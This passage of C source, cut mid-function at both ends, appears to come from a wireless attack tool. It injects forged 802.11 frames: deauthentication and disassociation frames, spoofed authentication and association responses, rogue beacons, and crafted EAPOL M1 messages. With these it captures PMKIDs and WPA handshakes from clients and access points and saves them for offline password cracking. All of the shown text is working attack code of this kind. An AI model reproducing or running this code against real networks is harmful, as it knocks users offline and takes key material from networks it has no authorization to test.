memcpy(macftx->addr3, macap, 6); macftx->duration = 0x013a; macftx->sequence = mydeauthenticationsequence++ << 4; if(mydeauthenticationsequence >= 4096) { mydeauthenticationsequence = 0; } packetout[HDRRT_SIZE +MAC_SIZE_NORM] = reason; if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +2) < 0) { perror("\nfailed to transmit deauthentication to broadcast"); errorcount++; outgoingcount--; } fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static inline void send_authenticationresponseopensystem(uint8_t *macsta, uint8_t *macap) { static mac_t *macftx; static const uint8_t authenticationresponsedata[] = { 0x00, 0x00, 0x02, 0x00, 0x00, 0x00 }; #define AUTHENTICATIONRESPONSE_SIZE sizeof(authenticationresponsedata) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macsta) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macsta) == false)) { return; } if(checkpownedstaap(macsta, macap) > RX_PMKID) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +AUTHENTICATIONRESPONSE_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_AUTH; memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); macftx->duration = 0x013a; macftx->sequence = myauthenticationrequestsequence++ << 4; if(myauthenticationrequestsequence >= 4096) { myauthenticationrequestsequence = 0; } memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &authenticationresponsedata, AUTHENTICATIONRESPONSE_SIZE); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +AUTHENTICATIONRESPONSE_SIZE) < 0) { perror("\nfailed to transmit authenticationresponse"); errorcount++; outgoingcount--; } fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static inline void send_authenticationrequestopensystem(uint8_t *mac_ap) { static int cssize; static mac_t *macftx; static const uint8_t authenticationrequestdata[] = { 0x00, 0x00, 0x01, 0x00, 0x00, 0x00 }; #define MYAUTHENTICATIONREQUEST_SIZE sizeof(authenticationrequestdata) static const uint8_t csbroadcom[] = { 0xdd, 0x09, 0x00, 0x10, 0x18, 0x02, 0x02, 0xf0, 0x05, 0x00, 0x00 }; #define CSBROADCOM_SIZE sizeof(csbroadcom) static const uint8_t csapplebroadcom[] = { 0xdd, 0x0b, 0x00, 0x17, 0xf2, 0x0a, 0x00, 0x01, 0x04, 0x00, 0x00, 0x00, 0x00, 0xdd, 0x09, 0x00, 0x10, 0x18, 0x02, 0x00, 0x00, 0x10, 0x00, 0x00 }; #define CSAPPLEBROADCOM_SIZE sizeof(csapplebroadcom) static const uint8_t cssonos[] = { 0xdd, 0x06, 0x00, 0x0e, 0x58, 0x02, 0x01, 0x01 }; #define CSSONOS_SIZE sizeof(cssonos) static const uint8_t csnetgearbroadcom[] = { 0xdd, 0x06, 0x00, 0x14, 0x6c, 0x00, 0x00, 0x00, 0xdd, 0x09, 0x00, 0x10, 0x18, 0x02, 0x04, 0x00, 0x1c, 0x00, 0x00 }; #define CSNETGEARBROADCOM_SIZE sizeof(csnetgearbroadcom) static const uint8_t cswilibox[] = { 0xdd, 0x0f, 0x00, 0x19, 0x3b, 0x02, 0x04, 0x08, 0x00, 0x00, 0x00, 0x03, 0x04, 0x01, 0x00, 0x00, 0x00 }; #define CSWILIBOX_SIZE sizeof(cswilibox) static const uint8_t cscisco[] = { 0xdd, 0x1d, 0x00, 0x40, 0x96, 0x0c, 0x01, 0xb2, 0xb1, 0x74, 0xea, 0x45, 0xc5, 0x65, 0x01, 0x00, 0x00, 0xb9, 0x16, 0x00, 0x00, 0x00, 0x00, 0x1a, 0xc1, 0xdb, 0xf1, 0xf5, 0x05, 0xec, 0xed }; #define CSCISCO_SIZE sizeof(cscisco) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(mac_ap) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(mac_ap) == false)) { return; } if(checkpownedstaap(mac_mysta, mac_ap) > 0) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_AUTH; memcpy(macftx->addr1, mac_ap, 6); memcpy(macftx->addr2, &mac_mysta, 6); memcpy(macftx->addr3, mac_ap, 6); macftx->duration = 0x013a; macftx->sequence = myauthenticationrequestsequence++ << 4; if(myauthenticationrequestsequence >= 4096) { myauthenticationrequestsequence = 0; } memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &authenticationrequestdata, MYAUTHENTICATIONREQUEST_SIZE); if(stachipset == CS_BROADCOM) { memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE], &csbroadcom, CSBROADCOM_SIZE); cssize = CSBROADCOM_SIZE; } else if(stachipset == CS_APPLE_BROADCOM) { memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE], &csapplebroadcom, CSAPPLEBROADCOM_SIZE); cssize = CSAPPLEBROADCOM_SIZE; } else if(stachipset == CS_SONOS) { memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE], &cssonos, CSSONOS_SIZE); cssize = CSSONOS_SIZE; } else if(stachipset == CS_NETGEARBROADCOM) { memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE], &csnetgearbroadcom, CSNETGEARBROADCOM_SIZE); cssize = CSNETGEARBROADCOM_SIZE; } else if(stachipset == CS_WILIBOX) { memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE], &cswilibox, CSWILIBOX_SIZE); cssize = CSWILIBOX_SIZE; } else if(stachipset == CS_CISCO) { memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE], &cscisco, CSCISCO_SIZE); cssize = CSCISCO_SIZE; } else { cssize = 0; } if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE +cssize) < 0) { perror("\nfailed to transmit authenticationrequest"); errorcount++; outgoingcount--; } fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static inline void send_directed_proberequest(uint8_t *macap, int essid_len, uint8_t *essid) { static mac_t *macftx; static uint8_t *beaconptr; static int beaconlen; static uint8_t *essidtagptr; static ietag_t *essidtag; static const uint8_t directedproberequestdata[] = { 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x92, 0x98, 0xa4, 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c }; #define DIRECTEDPROBEREQUEST_SIZE sizeof(directedproberequestdata) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macap) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macap) == false)) { return; } if(checkpownedstaap(mac_mysta, macap) != 0) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +ESSID_LEN_MAX +DIRECTEDPROBEREQUEST_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_PROBE_REQ; memcpy(macftx->addr1, macap, 6); memcpy(macftx->addr2, &mac_mysta, 6); memcpy(macftx->addr3, macap, 6); macftx->sequence = myproberequestsequence++ << 4; if(myproberequestsequence >= 4096) { myproberequestsequence= 0; } beaconptr = payload_ptr +CAPABILITIESAP_SIZE; beaconlen = payload_len -CAPABILITIESAP_SIZE; essidtagptr = gettag(TAG_SSID, beaconptr, beaconlen); if(essidtagptr == NULL) { return; } essidtag = (ietag_t*)essidtagptr; if(essidtag->len > ESSID_LEN_MAX) { return; } packetout[HDRRT_SIZE +MAC_SIZE_NORM] = 0; packetout[HDRRT_SIZE +MAC_SIZE_NORM +1] = essid_len; memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +IETAG_SIZE], essid, essid_len); memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +IETAG_SIZE +essid_len], &directedproberequestdata, DIRECTEDPROBEREQUEST_SIZE); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +IETAG_SIZE +essid_len +DIRECTEDPROBEREQUEST_SIZE) < 0) { perror("\nfailed to transmit directed proberequest"); errorcount++; outgoingcount--; } fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static inline void send_undirected_proberequest() { static mac_t *macftx; static const uint8_t undirectedproberequestdata[] = { 0x00, 0x00, 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x92, 0x98, 0xa4, 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c }; #define UNDIRECTEDPROBEREQUEST_SIZE sizeof(undirectedproberequestdata) static uint8_t packetout[1024]; memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +ESSID_LEN_MAX +UNDIRECTEDPROBEREQUEST_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_PROBE_REQ; memcpy(macftx->addr1, &mac_broadcast, 6); memcpy(macftx->addr2, &mac_mysta, 6); memcpy(macftx->addr3, &mac_broadcast, 6); macftx->sequence = myproberequestsequence++ << 4; if(myproberequestsequence >= 4096) { myproberequestsequence= 0; } memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &undirectedproberequestdata, UNDIRECTEDPROBEREQUEST_SIZE); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +UNDIRECTEDPROBEREQUEST_SIZE) < 0) { perror("\nfailed to transmit undirected proberequest"); errorcount++; outgoingcount--; } fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static void send_broadcastbeacon() { static mac_t *macftx; static capap_t *capap; static const uint8_t broadcastbeacondata[] = { 0x00, 0x00, 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x12, 0x98, 0x24, 0x03, 0x01, 0x0d, 0x05, 0x04, 0x00, 0x01, 0x00, 0x00, 0x2a, 0x01, 0x00, 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c, 0x2d, 0x1a, 0xef, 0x11, 0x1b, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x06, 0xe6, 0x47, 0x0d, 0x00, 0x3d, 0x16, 0x0d, 0x0f, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x0e, 0x14, 0x00, 0x0a, 0x00, 0x2c, 0x01, 0xc8, 0x00, 0x14, 0x00, 0x05, 0x00, 0x19, 0x00, 0x7f, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00, 0xdd, 0x09, 0x00, 0x03, 0x7f, 0x01, 0x01, 0x00, 0x00, 0xff, 0x7f, 0xdd, 0x0c, 0x00, 0x04, 0x0e, 0x01, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x00, 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x04, 0x10, 0x4a, 0x00, 0x01, 0x10, 0x10, 0x44, 0x00, 0x01, 0x02, 0x10, 0x49, 0x00, 0x06, 0x00, 0x37, 0x2a, 0x00, 0x01, 0x20 }; #define BROADCASTBEACON_SIZE sizeof(broadcastbeacondata) static uint8_t packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +BROADCASTBEACON_SIZE +1]; memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +BROADCASTBEACON_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_BEACON; memcpy(macftx->addr1, &mac_broadcast, 6); memcpy(macftx->addr2, &mac_myap, 6); memcpy(macftx->addr3, &mac_myap, 6); macftx->sequence = mybeaconsequence++ << 4; if(mybeaconsequence >= 4096) { mybeaconsequence = 0; } capap = (capap_t*)(packetout +HDRRT_SIZE +MAC_SIZE_NORM); capap->timestamp = mytime++; capap->beaconintervall = 0x64; capap->capabilities = 0x431; packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE] = 0; memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE], &broadcastbeacondata, BROADCASTBEACON_SIZE); packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +0x0e] = channelscanlist[cpa]; if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +BROADCASTBEACON_SIZE) < 0) { perror("\nfailed to transmit broadcast beacon"); errorcount++; outgoingcount--; } fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static inline bool detectpmkid(uint16_t authlen, uint8_t *authpacket) { static pmkid_t *pmkid; static uint8_t pmkidoui[] = { 0x00, 0x0f, 0xac }; #define PMKIDOUI_SIZE sizeof(pmkidoui) if(authlen < WPAKEY_SIZE +PMKID_SIZE) { return false; } pmkid = (pmkid_t*)(authpacket +WPAKEY_SIZE); if((pmkid->id != 0xdd) && (pmkid->id != 0x14)) { return false; } if(memcmp(&pmkidoui, pmkid->oui, PMKIDOUI_SIZE) != 0) { return false; } if(pmkid->type != 0x04) { return false; } if(memcmp(pmkid->pmkid, &nulliv, 16) == 0) { return false; } return true; } /*===========================================================================*/ static inline void process80211eap() { static uint8_t *eapauthptr; static eapauth_t *eapauth; static int eapauthlen; static uint16_t authlen; static wpakey_t *wpak; static uint16_t keyinfo; static unsigned long long int rc; static int calceapoltimeout; static exteap_t *exteap; static uint16_t exteaplen; eapauthptr = payload_ptr +LLC_SIZE; eapauthlen = payload_len -LLC_SIZE; eapauth = (eapauth_t*)eapauthptr; authlen = ntohs(eapauth->len); if(authlen > (eapauthlen -4)) { return; } if(eapauth->type == EAPOL_KEY) { wpak = (wpakey_t*)(eapauthptr +EAPAUTH_SIZE); keyinfo = (getkeyinfo(ntohs(wpak->keyinfo))); rc = be64toh(wpak->replaycount); if(keyinfo == 1) { if((authlen == 95) && (memcmp(macfrx->addr1, &mac_mysta, 6) == 0)) { addpownedstaap(macfrx->addr1, macfrx->addr2, RX_M1); return; } if(fd_pcapng != 0) { writeepb(fd_pcapng); } if(rc == rcrandom) { memcpy(&laststam1, macfrx->addr1, 6); memcpy(&lastapm1, macfrx->addr2, 6); lastrcm1 = rc; lasttimestampm1 = timestamp; return; } if(authlen > 95) { if(detectpmkid(authlen, eapauthptr +EAPAUTH_SIZE) == true) { if((addpownedstaap(macfrx->addr1, macfrx->addr2, RX_PMKID) & RX_PMKID) != RX_PMKID) { if((statusout & STATUS_EAPOL) == STATUS_EAPOL) { printtimenet(macfrx->addr1, macfrx->addr2); if(memcmp(macfrx->addr1, &mac_mysta, 6) == 0) { fprintf(stdout, " [FOUND PMKID CLIENT-LESS]\n"); } else { fprintf(stdout, " [FOUND PMKID]\n"); } } } return; } } return; } if(keyinfo == 3) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } calceapoltimeout = timestamp -lasttimestampm2; if((calceapoltimeout < eapoltimeout) && ((rc -lastrcm2) == 1) && (memcmp(&laststam2,macfrx->addr1, 6) == 0) && (memcmp(&lastapm2, macfrx->addr2, 6) == 0)) { if(addpownedstaap(macfrx->addr1, macfrx->addr2, RX_M23) == false) { if((statusout & STATUS_EAPOL) == STATUS_EAPOL) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT %d]\n", calceapoltimeout); } } } memset(&laststam2, 0, 6); memset(&lastapm2, 0, 6); lastrcm2 = 0; lasttimestampm2 = 0; return; } if(keyinfo == 2) { calceapoltimeout = timestamp -lasttimestampm1; if((rc == rcrandom) && (memcmp(&laststam1, macfrx->addr2, 6) == 0) && (memcmp(&lastapm1, macfrx->addr1, 6) == 0)) { if(fd_pcapng != 0) { writeepbm2(fd_pcapng); } if(addpownedstaap(macfrx->addr2, macfrx->addr1, RX_M12) == false) { if((statusout & STATUS_EAPOL) == STATUS_EAPOL) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT %d]\n", calceapoltimeout); } } return; } if(fd_pcapng != 0) { writeepb(fd_pcapng); } memcpy(&laststam2, macfrx->addr2, 6); memcpy(&lastapm2, macfrx->addr1, 6); lastrcm2 = rc; lasttimestampm2 = timestamp; return; } if(keyinfo == 4) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if(checkpownedstaap(macfrx->addr2, macfrx->addr1) == false) { if(disassociationflag == false) { send_disassociation(macfrx->addr2, macfrx->addr1, WLAN_REASON_DISASSOC_AP_BUSY); } } memset(&laststam2, 0, 6); memset(&lastapm2, 0, 6); lastrcm2 = 0; lasttimestampm2 = 0; return; } else { if(fd_pcapng != 0) { writeepb(fd_pcapng); } } return; } if(eapauth->type == EAP_PACKET) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if(fd_pcapng != 0) { writeepb(fd_pcapng); } exteap = (exteap_t*)(eapauthptr +EAPAUTH_SIZE); exteaplen = ntohs(exteap->extlen); if((eapauthlen != exteaplen +4) && (exteaplen -= 5)) { return; } if(exteap->exttype == EAP_TYPE_ID) { if((exteap->code == EAP_CODE_REQ) && (exteap->data[0] != 0)) { if((statusout & STATUS_EAPOL) == STATUS_EAPOL) { printtimenet(macfrx->addr1, macfrx->addr2); printid(exteaplen -5, exteap->data); fprintf(stdout, " [EAP REQUEST ID, SEQUENCE %d]\n", macfrx->sequence >> 4); } } if((exteap->code == EAP_CODE_RESP) && (exteap->data[0] != 0)) { if((statusout & STATUS_EAPOL) == STATUS_EAPOL) { printtimenet(macfrx->addr1, macfrx->addr2); printid(exteaplen -5, exteap->data); fprintf(stdout, " [EAP RESPONSE ID, SEQUENCE %d]\n", macfrx->sequence >> 4); } } } return; } if(eapauth->type == EAPOL_START) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if(attackclientflag == false) { send_requestidentity(macfrx->addr2, macfrx->addr1); } return; } if(eapauth->type == EAPOL_LOGOFF) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } return; } if(eapauth->type == EAPOL_ASF) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } return; } if(eapauth->type == EAPOL_MKA) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } return; } /* for unknown EAP types */ if(fd_pcapng != 0) { writeepb(fd_pcapng); } return; } /*===========================================================================*/ /*===========================================================================*/ static void send_m1(uint8_t *macsta, uint8_t *macap) { static mac_t *macftx; static const uint8_t anoncewpa2data[] = { 0x88, 0x02, 0x3a, 0x01, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x00, 0x00, 0x06, 0x00, 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x88, 0x8e, 0x02, 0x03, 0x00, 0x5f, 0x02, 0x00, 0x8a, 0x00, 0x10, }; #define ANONCEWPA2_SIZE sizeof(anoncewpa2data) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macsta) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macsta) == false)) { return; } if(checkpownedstaap(macsta, macap) >= 3) { return; } memset(&packetout, 0, HDRRT_SIZE +140); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); memcpy(&packetout[HDRRT_SIZE], &anoncewpa2data, ANONCEWPA2_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); packetout[HDRRT_SIZE +ANONCEWPA2_SIZE +7] = rcrandom &0xff; packetout[HDRRT_SIZE +ANONCEWPA2_SIZE +6] = (rcrandom >> 8) &0xff; memcpy(&packetout[HDRRT_SIZE +ANONCEWPA2_SIZE +8], &anoncerandom, 32); if(write(fd_socket, packetout, HDRRT_SIZE +133) < 0) { perror("\nfailed to transmit M1"); errorcount++; outgoingcount--; } outgoingcount++; fsync(fd_socket); macftx->retry = 1; if(write(fd_socket, packetout, HDRRT_SIZE +133) < 0) { perror("\nfailed to retransmit M1"); errorcount++; outgoingcount--; } outgoingcount++; fsync(fd_socket); return; } /*===========================================================================*/ static inline void process80211reassociation_resp() { if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { return; } send_m1(macfrx->addr1, macfrx->addr2); if((statusout & STATUS_ASSOC) == STATUS_ASSOC) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [REASSOCIATIONRESPONSE, SEQUENCE %d]\n", macfrx->sequence >> 4); } if(fd_pcapng != 0) { writeepb(fd_pcapng); } return; } /*===========================================================================*/ static void send_reassociationresponse(uint8_t *macsta, uint8_t *macap) { static mac_t *macftx; static const uint8_t associationresponsedata[] = { 0x01, 0x08, 0x82, 0x84, 0x8b, 0x0c, 0x12, 0x96, 0x18, 0x24, 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, 0x2d, 0x1a, 0xaf, 0x01, 0x1b, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x06, 0xe6, 0x47, 0x0d, 0x00, 0x3d, 0x16, 0x0d, 0x0f, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x0e, 0x14, 0x00, 0x0a, 0x00, 0x2c, 0x01, 0xc8, 0x00, 0x14, 0x00, 0x05, 0x00, 0x19, 0x00, 0x7f, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00 }; #define ASSOCIATIONRESPONSE_SIZE sizeof(associationresponsedata) static const uint8_t associationid[] = { 0x31, 0x04, 0x00, 0x00, 0x00, 0xc0 }; #define ASSOCIATIONID_SIZE sizeof(associationid) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macsta) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macsta) == false)) { return; } if(checkpownedstaap(macsta, macap) > RX_PMKID) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONID_SIZE +ASSOCIATIONRESPONSE_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_REASSOC_RESP; memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); macftx->duration = 0x013a; macftx->sequence = myassociationresponsesequence++ << 4; if(myassociationresponsesequence >= 4096) { myassociationresponsesequence = 0; } memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &associationid, ASSOCIATIONID_SIZE); memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONID_SIZE], &associationresponsedata, ASSOCIATIONRESPONSE_SIZE); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONID_SIZE +ASSOCIATIONRESPONSE_SIZE) < 0) { perror("\nfailed to transmit reassociationresponse"); errorcount++; outgoingcount--; } outgoingcount++; fsync(fd_socket); return; } /*===========================================================================*/ static inline void process80211reassociation_req() { static uint8_t *essidtag_ptr; static ietag_t *essidtag; static uint8_t *reassociationrequest_ptr; static int reassociationrequestlen; if(attackclientflag == false) { send_reassociationresponse(macfrx->addr2, macfrx->addr1); usleep(M1WAITTIME); send_m1(macfrx->addr2, macfrx->addr1); } if(payload_len < (int)CAPABILITIESSTA_SIZE) { return; } reassociationrequest_ptr = payload_ptr +CAPABILITIESREQSTA_SIZE; reassociationrequestlen = payload_len -CAPABILITIESREQSTA_SIZE; if(reassociationrequestlen < (int)IETAG_SIZE) { return; } essidtag_ptr = gettag(TAG_SSID, reassociationrequest_ptr, reassociationrequestlen); if(essidtag_ptr == NULL) { return; } essidtag = (ietag_t*)essidtag_ptr; if(essidtag->len > ESSID_LEN_MAX) { return; } if((essidtag->len == 0) || (essidtag->len > ESSID_LEN_MAX) || (essidtag->data[0] == 0)) { return; } if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_ASSOC) == STATUS_ASSOC) { printtimenet(macfrx->addr1, macfrx->addr2); // printessid(essidtag_ptr); fprintf(stdout, " [REASSOCIATIONREQUEST, SEQUENCE %d]\n", macfrx->sequence >> 4); } return; } /*===========================================================================*/ static void send_associationresponse(uint8_t *macsta, uint8_t *macap) { static mac_t *macftx; static const uint8_t associationresponsedata[] = { 0x01, 0x08, 0x82, 0x84, 0x8b, 0x0c, 0x12, 0x96, 0x18, 0x24, 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, 0x2d, 0x1a, 0xaf, 0x01, 0x1b, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x06, 0xe6, 0x47, 0x0d, 0x00, 0x3d, 0x16, 0x0d, 0x0f, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x0e, 0x14, 0x00, 0x0a, 0x00, 0x2c, 0x01, 0xc8, 0x00, 0x14, 0x00, 0x05, 0x00, 0x19, 0x00, 0x7f, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00 }; #define ASSOCIATIONRESPONSE_SIZE sizeof(associationresponsedata) static const uint8_t associationid[] = { 0x31, 0x04, 0x00, 0x00, 0x00, 0xc0 }; #define ASSOCIATIONID_SIZE sizeof(associationid) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macsta) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macsta) == false)) { return; } if(checkpownedstaap(macsta, macap) > RX_M1) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONID_SIZE +ASSOCIATIONRESPONSE_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_ASSOC_RESP; memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); macftx->duration = 0x013a; macftx->sequence = myassociationresponsesequence++ << 4; if(myassociationresponsesequence >= 4096) { myassociationresponsesequence = 0; } memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &associationid, ASSOCIATIONID_SIZE); memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONID_SIZE], &associationresponsedata, ASSOCIATIONRESPONSE_SIZE); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONID_SIZE +ASSOCIATIONRESPONSE_SIZE) < 0) { perror("\nfailed to transmit associationresponse"); errorcount++; outgoingcount--; } outgoingcount++; fsync(fd_socket); return; } /*===========================================================================*/ static inline void process80211association_resp() { if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { return; } send_m1(macfrx->addr1, macfrx->addr2); if((statusout & STATUS_ASSOC) == STATUS_ASSOC) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [ASSOCIATIONRESPONSE, SEQUENCE %d]\n", 